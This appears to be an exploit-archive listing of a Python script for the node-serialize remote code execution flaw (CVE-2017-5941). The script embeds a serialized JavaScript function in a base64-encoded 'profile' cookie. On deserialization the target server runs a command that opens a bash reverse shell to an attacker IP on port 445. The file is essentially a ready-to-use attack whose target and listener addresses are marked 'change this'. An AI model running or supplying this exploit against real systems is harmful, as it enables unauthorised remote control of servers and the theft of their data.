fcdaf2028f
3 changes to exploits/shellcodes b2evolution 6.11.6 - 'plugin name' Stored XSS Node.JS - 'node-serialize' Remote Code Execution (2)
36 lines
No EOL
1.2 KiB
Python
Executable file
36 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
|
|
# Exploit Author: UndeadLarva
|
|
# Software Link: https://www.npmjs.com/package/node-serialize
|
|
# Version: 0.0.4
|
|
# CVE: CVE-2017-5941
|
|
|
|
import requests
|
|
import re
|
|
import base64
|
|
import sys
|
|
|
|
url = 'http://192.168.100.133:8000/' # change this
|
|
|
|
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
|
|
"return function () {"
|
|
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
|
|
"console.log('still inside');"
|
|
"const { exec } = require('child_process');"
|
|
"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
|
|
"}"
|
|
"})(require('http').ServerResponse.prototype.end)")
|
|
|
|
# rce = "_$$ND_FUNC$$_process.exit(0)"
|
|
# code ="_$$ND_FUNC$$_console.log('behind you')"
|
|
code = "_$$ND_FUNC$$_" + payload
|
|
|
|
string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
|
|
|
|
cookie = {'profile':base64.b64encode(string)}
|
|
|
|
try:
|
|
response = requests.get(url, cookies=cookie).text
|
|
print response
|
|
except requests.exceptions.RequestException as e:
|
|
print('Oops!')
|
|
sys.exit(1) |